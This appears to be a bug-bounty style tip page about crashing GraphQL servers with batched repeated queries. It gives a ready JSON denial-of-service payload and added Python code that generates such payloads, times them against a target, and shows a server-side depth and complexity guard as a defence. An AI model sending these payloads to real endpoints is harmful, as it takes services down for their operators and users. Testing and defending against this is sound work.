0x07 - GraphQL Crash via Recursive Queries

Did you know you can trigger a Denial of Service by crashing the GraphQL server using recursive queries?

If you encounter an application that uses GraphQL, there are several simple (yet very effective) Denial of Service attacks that you can try.

One of the payloads abuses the ability to pack many copies of the same query into a single request (query batching): the payload below repeats the selection query{x} dozens of times inside one operation named DoS, so the server has to validate and resolve every copy for a single HTTP request.

As the number of batched copies per request was increased, an exponential increase in response time was observed, ultimately exhausting the server.


Payload

{"query":"query DoS{query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}query{x}}"}
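The following is an added example and not code from the original page: a generator that builds the payload above with any number of copies (so the response-time curve can be measured instead of eyeballed), plus the server-side guard that stops it, a brace-depth scan that counts selection sets and nesting depth and rejects requests over a threshold. The field name query, subfield x, operation name DoS, the thresholds and the localhost URL are placeholders chosen for the example.

```python
"""Batched-query DoS: payload builder and a server-side limit check.

Added example, not from the original page. Assumptions (placeholders):
field "query", subfield "x", operation "DoS", the thresholds in
check_query() and the target URL in the commented-out usage line.
"""
import json
import time
import urllib.request


def build_query(copies, field="query", subfield="x", op_name="DoS"):
    """Return one operation containing `copies` repetitions of field{subfield}.

    copies=81 reproduces the shape of the payload shown on the page.
    """
    body = "".join(f"{field}{{{subfield}}}" for _ in range(copies))
    return f"query {op_name}{{{body}}}"


def build_payload(copies, **kw):
    """Return the JSON request body ({"query": ...}) for `copies` repetitions."""
    return json.dumps({"query": build_query(copies, **kw)})


def selection_stats(query_text):
    """Return (selection_sets, max_depth) for a raw GraphQL document.

    selection_sets counts every '{ ... }' block nested below the operation's
    own braces (one per repeated `query{x}`); max_depth is the deepest brace
    nesting, counting the operation's own selection set as 1. Braces inside
    string literals and # comments are skipped so they cannot skew the count.
    This is a cheap pre-parse guard, not a GraphQL parser.
    """
    depth = max_depth = sets = 0
    in_string = False
    i = 0
    while i < len(query_text):
        c = query_text[i]
        if in_string:
            if c == "\\":
                i += 1               # skip the escaped character
            elif c == '"':
                in_string = False
        elif c == '"':
            in_string = True
        elif c == "#":               # comment runs to end of line
            while i < len(query_text) and query_text[i] != "\n":
                i += 1
        elif c == "{":
            depth += 1
            if depth > 1:            # depth 1 is the operation itself
                sets += 1
            max_depth = max(max_depth, depth)
        elif c == "}":
            depth -= 1
        i += 1
    return sets, max_depth


def check_query(query_text, max_selection_sets=50, max_depth=10):
    """Return (allowed, reason). Thresholds are illustrative, tune per schema."""
    sets, depth = selection_stats(query_text)
    if sets > max_selection_sets:
        return False, f"too many selection sets: {sets} > {max_selection_sets}"
    if depth > max_depth:
        return False, f"query too deep: {depth} > {max_depth}"
    return True, "ok"


def time_request(url, payload_json, timeout=30):
    """POST the payload and return the elapsed seconds (needs a live target)."""
    req = urllib.request.Request(
        url, data=payload_json.encode(), method="POST",
        headers={"Content-Type": "application/json"})
    t0 = time.perf_counter()
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()
    return time.perf_counter() - t0


if __name__ == "__main__":
    # Offline demo: show how the guard classifies growing batch sizes.
    for n in (1, 10, 81, 1000):
        print(n, "copies ->", check_query(build_query(n)))
    # Against a target you are authorised to test, plot n vs. seconds:
    # for n in (1, 10, 100, 1000):
    #     print(n, time_request("http://localhost:4000/graphql", build_payload(n)))
```

Run time_request with increasing copy counts to reproduce the response-time curve; a server that rejects the request in check_query before parsing never pays the validation and resolution cost of the copies. Most GraphQL server libraries expose an equivalent depth or complexity limit, which is the proper place for this check.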